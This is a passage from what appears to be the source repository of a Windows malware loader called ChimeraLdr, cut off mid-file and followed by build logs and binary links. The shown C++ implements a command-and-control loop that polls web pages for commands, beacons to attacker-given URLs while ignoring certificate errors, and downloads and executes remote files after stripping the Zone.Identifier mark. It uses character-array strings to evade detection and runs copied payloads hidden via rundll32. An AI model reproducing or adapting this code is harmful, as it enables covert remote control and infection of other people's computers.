| 238 | if (pResponse) 239 | { 240 | DWORD dwRead; 241 | dbg("Reading html: "); 242 | while (InternetReadFile(hRequest, pResponse, 10240 - 1, &dwRead) && dwRead) 243 | { 244 | pResponse[dwRead] = 0; 245 | PCHAR pFoundCommand; 246 | if (ParseHtml(pResponse, dwRead, &pFoundCommand)) 247 | { 248 | dbg("Found watermark"); 249 | PCHAR pFoundCommandEnd = mystrstr(pFoundCommand, ENDWATERMARK); 250 | if (!pFoundCommandEnd) 251 | break; 252 | pFoundCommandEnd[0] = '\0'; 253 | 254 | lstrcpyA(pCommandOutput, pFoundCommand); 255 | 256 | bRet = TRUE; 257 | } 258 | else 259 | { 260 | dbg("Watermark not found in this block"); 261 | } 262 | if (bRet) 263 | { 264 | break; 265 | } 266 | dwRead = 0; 267 | } 268 | VirtualFree(pResponse, 0, MEM_RELEASE); 269 | } 270 | } 271 | InternetCloseHandle(hRequest); 272 | } 273 | 274 | InternetCloseHandle(hInternet); 275 | return bRet; 276 | } 277 | 278 | 279 | 280 | BOOL IsCorrect(PWCHAR RequestUrl) 281 | { 282 | BOOL bDot = FALSE; 283 | BOOL bSlash = FALSE; 284 | 285 | WCHAR HttpSz[] = 286 | { 287 | L'h', L't', L't', L'p', L':', L'/', L'/', '\0' 288 | }; 289 | PWCHAR lpHttpStart = mystrstr(RequestUrl, L"http://"); 290 | 291 | if (!lpHttpStart) 292 | return FALSE; 293 | 294 | 295 | if (RequestUrl != lpHttpStart) 296 | return FALSE; 297 | 298 | RequestUrl += 7; 299 | 300 | for (INT i = 0; i < lstrlenW(RequestUrl); i++) 301 | { 302 | if (RequestUrl[i] == L'.') 303 | bDot = TRUE; 304 | else if (RequestUrl[i] == L'/') 305 | bSlash = TRUE; 306 | } 307 | return ((bDot) && (bSlash)); 308 | } 309 | 310 | class RAII_VirtualAlloc 311 | { 312 | public: 313 | RAII_VirtualAlloc(DWORD dwSize) 314 | { 315 | pAddr = VirtualAlloc(0, dwSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 316 | } 317 | ~RAII_VirtualAlloc() 318 | { 319 | VirtualFree(pAddr, 0, MEM_RELEASE); 320 | } 321 | LPVOID GetAddr() 322 | { 323 | return pAddr; 324 | } 325 | private: 326 | LPVOID pAddr; 327 | }; 328 | 329 | BOOL GetDomainPart(PWCHAR pOut, PWCHAR RequestUrl, DWORD dwLen) 330 | { 331 | RequestUrl += 7; // îáðåçàåì http:// 332 | lstrcpyW(pOut, RequestUrl); 333 | 334 | for (INT i = 0; i < lstrlenW(RequestUrl); i++) 335 | { 336 | if (pOut[i] == L'/') 337 | { 338 | pOut[i] = '\0'; 339 | break; 340 | } 341 | } 342 | 343 | return TRUE; 344 | } 345 | 346 | BOOL GetScriptPart(PWCHAR pOut, PWCHAR RequestUrl, DWORD dwLen) 347 | { 348 | RequestUrl += 7; 349 | 350 | for (INT i = 0; i < lstrlenW(RequestUrl); i++) 351 | { 352 | if (RequestUrl[i] == L'/') 353 | { 354 | RequestUrl += i; 355 | lstrcpyW(pOut, RequestUrl); 356 | break; 357 | } 358 | } 359 | 360 | return TRUE; 361 | } 362 | 363 | BOOL MakeRequest(PCHAR RequestUrl, PWCHAR SensitiveInformation) 364 | { 365 | RAII_VirtualAlloc UnicodeUrl(512); 366 | PWCHAR pUnicodeUrl = (PWCHAR)UnicodeUrl.GetAddr(); 367 | 368 | if (!pUnicodeUrl) 369 | return FALSE; 370 | 371 | wsprintfW(pUnicodeUrl, L"%S", RequestUrl); 372 | 373 | if (!IsCorrect(pUnicodeUrl)) 374 | return FALSE; 375 | 376 | RAII_VirtualAlloc DomainPart(512); 377 | RAII_VirtualAlloc ScriptPart(512); 378 | 379 | PWCHAR pDomainPart = (PWCHAR)DomainPart.GetAddr(); 380 | PWCHAR pScriptPart = (PWCHAR)ScriptPart.GetAddr(); 381 | 382 | if (!GetDomainPart(pDomainPart, pUnicodeUrl, 512)) 383 | return FALSE; 384 | if (!GetScriptPart(pScriptPart, pUnicodeUrl, 512)) 385 | return FALSE; 386 | 387 | HINTERNET hInternet; 388 | do 389 | { 390 | hInternet = OpenInternet(SensitiveInformation); 391 | } while (!hInternet); 392 | 393 | BOOL bRet = FALSE; 394 | 395 | DWORD dwTries = 0; 396 | 397 | HINTERNET hConnect; 398 | do 399 | { 400 | hConnect = InternetConnectW(hInternet, pDomainPart, INTERNET_DEFAULT_HTTPS_PORT, L"", L"", INTERNET_SERVICE_HTTP, 0, 0); 401 | dwTries++; 402 | if ((dwTries == 5) && (!hConnect)) 403 | { 404 | InternetCloseHandle(hInternet); 405 | return FALSE; 406 | } 407 | } while ((!hConnect) || (Sleep(10000), FALSE)); 408 | 409 | 410 | WCHAR GetSz[] = 411 | { 412 | L'G', L'E', L'T', L'\0' 413 | }; 414 | 415 | WCHAR HttpVersz[] = 416 | { 417 | L'H', L'T', L'T', L'P', L'/', L'1', L'.', L'1', '\0' 418 | }; 419 | 420 | HINTERNET hRequest = HttpOpenRequestW(hConnect, GetSz, pScriptPart, HttpVersz, 0, 0, 421 | INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | 422 | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | 423 | INTERNET_FLAG_NO_AUTH | 424 | INTERNET_FLAG_NO_CACHE_WRITE | 425 | INTERNET_FLAG_NO_UI | 426 | INTERNET_FLAG_SECURE | 427 | INTERNET_FLAG_PRAGMA_NOCACHE | 428 | INTERNET_FLAG_RELOAD, NULL); 429 | 430 | if (hRequest) 431 | { 432 | 433 | if (HttpSendRequestW(hRequest, 0, 0, 0, 0)) 434 | bRet = TRUE; 435 | 436 | InternetCloseHandle(hRequest); 437 | } 438 | 439 | InternetCloseHandle(hInternet); 440 | return bRet; 441 | } 442 | 443 | BOOL DownloadNexecute(PCHAR pUrl) 444 | { 445 | GlobalMemory MyMem(1024 + 2 + 512 + 100); 446 | PWCHAR pUnicodeUrl = (PWCHAR)MyMem.localloc(512); 447 | wsprintfW(pUnicodeUrl, L"%S", pUrl); 448 | PWCHAR pTarget = (PWCHAR)MyMem.localloc(512); 449 | 450 | WCHAR szRandomString[RandomDirectoryLen + 4 + 1] = 451 | { 452 | L'P', L'a', L'i', L'm', L'o', L'n', L'\0' 453 | }; 454 | 455 | if (!GenerateRandomString(szRandomString, RandomDirectoryLen)) 456 | dbg("Can not gen random string, using default"); 457 | 458 | Downloader Dwnld; 459 | 460 | HRESULT hRes = SHGetFolderPathW(0, CSIDL_APPDATA | CSIDL_FLAG_CREATE, NULL, SHGFP_TYPE_CURRENT, pTarget); 461 | if (hRes != S_OK) 462 | GetTempPathW(256, pTarget); 463 | 464 | lstrcatW(pTarget, L"\\"); 465 | 466 | lstrcatW(pTarget, szRandomString); 467 | HINSTANCE hInst = (HINSTANCE)0; 468 | if (Dwnld.save(pUnicodeUrl, pTarget)) 469 | { 470 | PWCHAR pZoneIdentifier = (PWCHAR)MyMem.localloc(512 + 100); 471 | WCHAR ZoneIdent[] = 472 | { 473 | L'%', L's', L':', L'Z', L'o', L'n', L'e', L'.', 474 | L'I', L'd', L'e', L'n', L't', 475 | L'i', L'f', L'i', L'e', L'r', L'\0' 476 | }; 477 | wsprintfW(pZoneIdentifier, ZoneIdent, pTarget); 478 | 479 | if (DeleteFileW(pZoneIdentifier)) 480 | dbg("Zone identifier found and removed"); 481 | 482 | WCHAR szOpen[] = 483 | { 484 | L'o', L'p', L'e', L'n', L'\0' 485 | }; 486 | hInst = ShellExecuteW(0, szOpen, pTarget, 0, 0, SW_SHOW); 487 | } 488 | return ((INT)hInst > 32); 489 | } 490 | 491 | DWORD WINAPI ControlMain() 492 | { 493 | 494 | PCHAR pCommand = (PCHAR)VirtualAlloc(0, 1024, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 495 | if (!pCommand) 496 | ExitProcess(0); 497 | PCHAR pCommandOld = (PCHAR)VirtualAlloc(0, 1025, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 498 | if (!pCommand) 499 | { 500 | VirtualFree(pCommand, 0, MEM_RELEASE); 501 | ExitProcess(0); 502 | } 503 | 504 | lstrcpyA(pCommandOld, "AAAAAA"); 505 | 506 | PCHAR pData; 507 | 508 | BOOL bFound = FALSE; 509 | while (TRUE) 510 | { 511 | 512 | const INT PAGE_NUM = 3; 513 | PWCHAR szPages[PAGE_NUM] = 514 | { 515 | L"/id1", 516 | L"/id2", 517 | L"/id3" 518 | }; 519 | 520 | for (INT i = 0; i < PAGE_NUM; i++) 521 | { 522 | bFound = GetCommand(pCommand, szPages[i]); 523 | if (bFound) 524 | { 525 | dbg(L"Found C&C page:", szPages[i]); 526 | dbg("Read command: ", pCommand); 527 | 528 | if (!lstrcmpA(pCommandOld, pCommand)) 529 | { 530 | dbg("Already executed"); 531 | break; 532 | } 533 | lstrcpyA(pCommandOld, pCommand); 534 | 535 | CHAR MsgCom[] = 536 | { 537 | 'm', 's', 'g', 'c', '\0' 538 | }; 539 | 540 | CHAR StatCom[] = 541 | { 542 | 's', 't', 'a', 't', 'c', '\0' 543 | }; 544 | 545 | CHAR NoOperation[] = 546 | { 547 | 'n', 'o', 'p', 'c', '\0' 548 | }; 549 | 550 | CHAR CommDownload[] = 551 | { 552 | 'd', 'w', 'n', 'l', 'd', '\0' 553 | }; 554 | 555 | if (mystrstr(pCommand, MsgCom)) 556 | { 557 | dbg(L"Found command msgc"); 558 | pData = mystrstr(pCommand, MsgCom) + 4; 559 | if (*pData != '\0') 560 | { 561 | MessageBoxA(0, pData, pData, MB_OK); 562 | } 563 | } 564 | else if (mystrstr(pCommand, StatCom)) //format http://subdomain.server.com/script.php or http://server.com/script.php 565 | { 566 | dbg(L"Found command stat"); 567 | pData = mystrstr(pCommand, StatCom) + 5; 568 | if (*pData != '\0') 569 | { 570 | 571 | PCHAR pUrl = (PCHAR)VirtualAlloc(0, Base64decode_len(pData) + 2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 572 | 573 | if (pUrl) 574 | { 575 | Base64decode(pUrl, pData); 576 | 577 | WCHAR BearIdentificator[] = 578 | { 579 | L'B', L'e', L'a', L'r', L'l', L'd', L'r', L'\0' 580 | }; 581 | MakeRequest(pUrl, BearIdentificator); 582 | 583 | VirtualFree(pUrl, 0, MEM_RELEASE); 584 | } 585 | 586 | } 587 | } 588 | else if (mystrstr(pCommand, NoOperation)) 589 | { 590 | dbg(L"No operation"); 591 | } 592 | else if (mystrstr(pCommand, CommDownload)) 593 | { 594 | dbg(L"Download and execute command found"); 595 | pData = mystrstr(pCommand, CommDownload) + 5; 596 | if (*pData != '\0') 597 | { 598 | PCHAR pUrl = (PCHAR)VirtualAlloc(0, Base64decode_len(pData) + 2, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 599 | 600 | if (pUrl) 601 | { 602 | Base64decode(pUrl, pData); 603 | 604 | if (DownloadNexecute(pUrl)) 605 | { 606 | dbg("Downloaded and executed!"); 607 | } 608 | else 609 | { 610 | dbg("Error downloading and executing file"); 611 | } 612 | 613 | VirtualFree(pUrl, 0, MEM_RELEASE); 614 | } 615 | } 616 | } 617 | 618 | break; 619 | } 620 | else 621 | { 622 | dbg(L"Is not C&C: ", szPages[i]); 623 | 624 | 625 | } 626 | } 627 | dbg(L"Sleeping 30 secs"); 628 | Sleep(30 * 1000); 629 | } 630 | VirtualFree(pCommand, 0, MEM_RELEASE); 631 | VirtualFree(pCommandOld, 0, MEM_RELEASE); 632 | ExitProcess(0); 633 | } 634 | -------------------------------------------------------------------------------- /ChimeraLdr/Control.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include "global.h" 3 | 4 | DWORD WINAPI ControlMain(); 5 | -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.Build.CppClean.log: -------------------------------------------------------------------------------- 1 | c:\users\malpwn\documents\github_stuff\chimeraldr\debug\vc142.pdb 2 | c:\users\malpwn\documents\github_stuff\chimeraldr\debug\vc142.idb 3 | c:\users\malpwn\documents\github_stuff\chimeraldr\debug\utils.obj 4 | c:\users\malpwn\documents\github_stuff\chimeraldr\debug\urlsaver.obj 5 | c:\users\malpwn\documents\github_stuff\chimeraldr\debug\memory.obj 6 | c:\users\malpwn\documents\github_stuff\chimeraldr\debug\install.obj 7 | c:\users\malpwn\documents\github_stuff\chimeraldr\debug\global.obj 8 | c:\users\malpwn\documents\github_stuff\chimeraldr\debug\chimera.obj 9 | c:\users\malpwn\documents\github_stuff\chimeraldr\debug\chimera.tlog\cl.command.1.tlog 10 | c:\users\malpwn\documents\github_stuff\chimeraldr\debug\chimera.tlog\cl.read.1.tlog 11 | c:\users\malpwn\documents\github_stuff\chimeraldr\debug\chimera.tlog\cl.write.1.tlog 12 | -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.dll -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.dll.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Debug\Chimera.dll 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.exp -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.ilk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.ilk -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.lib -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.log: -------------------------------------------------------------------------------- 1 |  Chimera.cpp 2 | Control.cpp 3 | global.cpp 4 | Install.cpp 5 | memory.cpp 6 | urlsaver.cpp 7 | utils.cpp 8 | C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\utils.cpp(18,23): warning C4244: '=': conversion from 'DWORD' to 'WCHAR', possible loss of data 9 | Generating Code... 10 | Creating library C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Debug\Chimera.lib and object C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Debug\Chimera.exp 11 | Chimera.vcxproj -> C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Debug\Chimera.dll 12 | -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.obj -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.pdb -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/Chimera.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.28.29910:TargetPlatformVersion=10.0.19041.0:VcpkgTriplet=x86-windows: 2 | Debug|Win32|C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\| 3 | -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/Chimera.write.1u.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.tlog/Chimera.write.1u.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Chimera.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Chimera.vcxproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Debug\Chimera.dll 2 | -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Control.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Control.obj -------------------------------------------------------------------------------- /ChimeraLdr/Debug/Install.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/Install.obj -------------------------------------------------------------------------------- /ChimeraLdr/Debug/global.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/global.obj -------------------------------------------------------------------------------- /ChimeraLdr/Debug/memory.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/memory.obj -------------------------------------------------------------------------------- /ChimeraLdr/Debug/urlsaver.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/urlsaver.obj -------------------------------------------------------------------------------- /ChimeraLdr/Debug/utils.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/utils.obj -------------------------------------------------------------------------------- /ChimeraLdr/Debug/vc142.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/vc142.idb -------------------------------------------------------------------------------- /ChimeraLdr/Debug/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Debug/vc142.pdb -------------------------------------------------------------------------------- /ChimeraLdr/Debug/vcpkg.applocal.log: -------------------------------------------------------------------------------- 1 |  2 | -------------------------------------------------------------------------------- /ChimeraLdr/Install.cpp: -------------------------------------------------------------------------------- 1 | #include "global.h" 2 | 3 | struct ProcessData 4 | { 5 | STARTUPINFO si; 6 | PROCESS_INFORMATION pi; 7 | WCHAR lpCommandLine[512]; 8 | }; 9 | 10 | 11 | BOOL CreateDllProcess(LPWSTR pDllPath) 12 | { 13 | GlobalMemory MyMem(sizeof(ProcessData)+1); 14 | 15 | ProcessData *lpProcInfo = (ProcessData*)MyMem.localloc(sizeof(ProcessData)); 16 | if (!lpProcInfo) 17 | { 18 | dbg("No memory in CreateDllProcess"); 19 | return FALSE; 20 | } 21 | 22 | BOOL bRet = FALSE; 23 | 24 | lpProcInfo->si.cb = sizeof(STARTUPINFO); 25 | 26 | WCHAR lpApplicationName[] = { L'r', L'u', L'n', L'd', L'l', L'l', L'3', L'2', L'.', L'e', L'x', L'e', L'\0' }; 27 | WCHAR lpEntryPointName[] = { L'C', L'H', L'I', L'M', L'E', L'R', L'A', L'\0' }; 28 | 29 | wsprintfW(lpProcInfo->lpCommandLine, L"%s \"%s\",%s", lpApplicationName, pDllPath, lpEntryPointName); 30 | bRet = CreateProcessW(0, lpProcInfo->lpCommandLine, 0, 0, 0, 0, 0, 0, (LPSTARTUPINFOW)&lpProcInfo->si, &lpProcInfo->pi); 31 | 32 | dbg(lpApplicationName); 33 | dbg(lpProcInfo->lpCommandLine); 34 | 35 | if (bRet) 36 | { 37 | CloseHandle(lpProcInfo->pi.hProcess); 38 | CloseHandle(lpProcInfo->pi.hThread); 39 | } 40 | 41 | return bRet; 42 | } 43 | 44 | HANDLE OpenFile(LPWSTR pFile, DWORD dwAccess, DWORD dwAttrib, DWORD dwCreateDisposition) 45 | { 46 | return CreateFileW(pFile, dwAccess, FILE_SHARE_READ, 0, dwCreateDisposition, dwAttrib, 0); 47 | } 48 | 49 | HANDLE GetFileMapping(HANDLE hFile) 50 | { 51 | return CreateFileMapping(hFile, 0, PAGE_WRITECOPY, 0, 0, 0); 52 | } 53 | 54 | LPVOID MapToMemory(HANDLE hMap) 55 | { 56 | return MapViewOfFile(hMap, FILE_MAP_COPY, 0, 0, 0); 57 | } 58 | 59 | BOOL BlockCopy(LPWSTR pFrom, LPWSTR pTo) 60 | { 61 | HANDLE hFile = OpenFile(pFrom, GENERIC_READ, FILE_ATTRIBUTE_NORMAL, OPEN_EXISTING); 62 | if (hFile == INVALID_HANDLE_VALUE) 63 | { 64 | dbg(L"Can not read: ", pFrom); 65 | return FALSE; 66 | } 67 | 68 | BOOL bRet = FALSE; 69 | 70 | HANDLE hMapping = GetFileMapping(hFile); 71 | if (hFile) 72 | { 73 | LPVOID pMem = MapToMemory(hMapping); 74 | if (pMem) 75 | { 76 | PIMAGE_DOS_HEADER pDosHead = (PIMAGE_DOS_HEADER)pMem; 77 | if (SetDllFlag(pDosHead)) 78 | { 79 | HANDLE hTargetFile = OpenFile(pTo, GENERIC_WRITE, FILE_ATTRIBUTE_HIDDEN, CREATE_ALWAYS); 80 | if (hTargetFile != INVALID_HANDLE_VALUE) 81 | { 82 | DWORD dwWritten; 83 | DWORD dwFileSize = GetFileSize(hFile, 0); 84 | bRet = WriteFile(hTargetFile, pMem, dwFileSize, &dwWritten, 0); 85 | CloseHandle(hTargetFile); 86 | } 87 | else 88 | { 89 | dbg(L"Can not create target file: ", pTo); 90 | } 91 | } 92 | else 93 | { 94 | dbg("Can not set dll flag to file: "); 95 | dbg((PCHAR)pMem); 96 | } 97 | UnmapViewOfFile(pMem); 98 | } 99 | else 100 | { 101 | dbg("Can not map to memory"); 102 | } 103 | 104 | CloseHandle(hMapping); 105 | } 106 | else 107 | { 108 | dbg("Can not create filemapping"); 109 | } 110 | CloseHandle(hFile); 111 | return bRet; 112 | } -------------------------------------------------------------------------------- /ChimeraLdr/Install.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Install.h -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.Build.CppClean.log: -------------------------------------------------------------------------------- 1 | c:\users\malpwn\documents\github_stuff\chimeraldr\release\vc142.pdb 2 | c:\users\malpwn\documents\github_stuff\chimeraldr\release\utils.obj 3 | c:\users\malpwn\documents\github_stuff\chimeraldr\release\urlsaver.obj 4 | c:\users\malpwn\documents\github_stuff\chimeraldr\release\memory.obj 5 | c:\users\malpwn\documents\github_stuff\chimeraldr\release\install.obj 6 | c:\users\malpwn\documents\github_stuff\chimeraldr\release\global.obj 7 | c:\users\malpwn\documents\github_stuff\chimeraldr\release\control.obj 8 | c:\users\malpwn\documents\github_stuff\chimeraldr\release\chimera.tlog\cl.command.1.tlog 9 | c:\users\malpwn\documents\github_stuff\chimeraldr\release\chimera.tlog\cl.read.1.tlog 10 | c:\users\malpwn\documents\github_stuff\chimeraldr\release\chimera.tlog\cl.write.1.tlog 11 | -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.exe -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.exe.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Release\Chimera.exe 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.exp -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.iobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.iobj -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.ipdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.ipdb -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.lib -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.log: -------------------------------------------------------------------------------- 1 | cl : command line warning D9025: overriding '/sdl' with '/GS-' 2 | Chimera.cpp 3 | Control.cpp 4 | global.cpp 5 | Install.cpp 6 | memory.cpp 7 | urlsaver.cpp 8 | utils.cpp 9 | C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\utils.cpp(18,23): warning C4244: '=': conversion from 'DWORD' to 'WCHAR', possible loss of data 10 | Creating library C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Release\Chimera.lib and object C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Release\Chimera.exp 11 | Generating code 12 | Previous IPDB not found, fall back to full compilation. 13 | All 48 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 14 | Finished generating code 15 | Chimera.vcxproj -> C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\Release\Chimera.exe 16 | -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.obj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.obj -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/Chimera.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.28.29910:TargetPlatformVersion=10.0.19041.0:VcpkgTriplet=x86-windows: 2 | Release|Win32|C:\Users\malpwn\Documents\github_stuff\ChimeraLdr\| 3 | -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/Chimera.write.1u.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.tlog/Chimera.write.1u.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Souhardya/ChimeraLdr/0566d41903be54a83d16daf53549d704179f3647/ChimeraLdr/Release/Chimera.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /ChimeraLdr/Release/Chimera.tlog/link.write.1.tlog: 